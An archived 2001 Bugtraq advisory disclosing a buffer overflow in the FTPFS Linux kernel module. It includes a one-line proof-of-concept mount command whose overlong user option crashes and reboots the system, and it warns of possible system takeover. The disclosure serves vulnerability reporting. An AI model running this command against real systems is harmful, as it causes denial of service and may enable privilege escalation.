[19644] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Buffer oveflow in FTPFS (linux kernel module)

daemon@ATHENA.MIT.EDU (Frank DENIS (Jedi/Sector One))
Wed Mar 14 04:13:36 2001

Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Message-ID:  <20010313152414.A1072@synchron.home.rtchat.com>
Date:         Tue, 13 Mar 2001 15:24:14 +0100
Reply-To: "Frank DENIS (Jedi/Sector One)" <j@4U.NET>
From: "Frank DENIS (Jedi/Sector One)" <j@4U.NET>
To: BUGTRAQ@SECURITYFOCUS.COM

  FTPFS (http://sourceforge.net/projects/ftpfs) is a Linux kernel module,
enhancing VFS with FTP volume mounting capabilities.

  However, it has insufficient bounds checking. If a user can enter mount
options through a wrapper, he can take over the whole system, even with
restricted capabilities.

  Here's a simple exploit :

mount -t ftpfs none /mnt -o ip=127.0.0.1,user=xxxxxxxxxxxxxxxxxxxxxxxxxxxx...

  The previous command produces an immediate reboot (tested with kernel 2.4.2
and FTPFS 0.1.1) .

  The author is aware of that vulnerability.

  Best regards,

--
  -=- Frank DENIS aka Jedi/Sector One < spam@jedi.claranet.fr > -=-
		LINAGORA SA (Paris, France) : http://www.linagora.com


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[19644] in bugtraq

Buffer oveflow in FTPFS (linux kernel module)

daemon@ATHENA.MIT.EDU (Frank DENIS (Jedi/Sector One))Wed Mar 14 04:13:36 2001

daemon@ATHENA.MIT.EDU (Frank DENIS (Jedi/Sector One))
Wed Mar 14 04:13:36 2001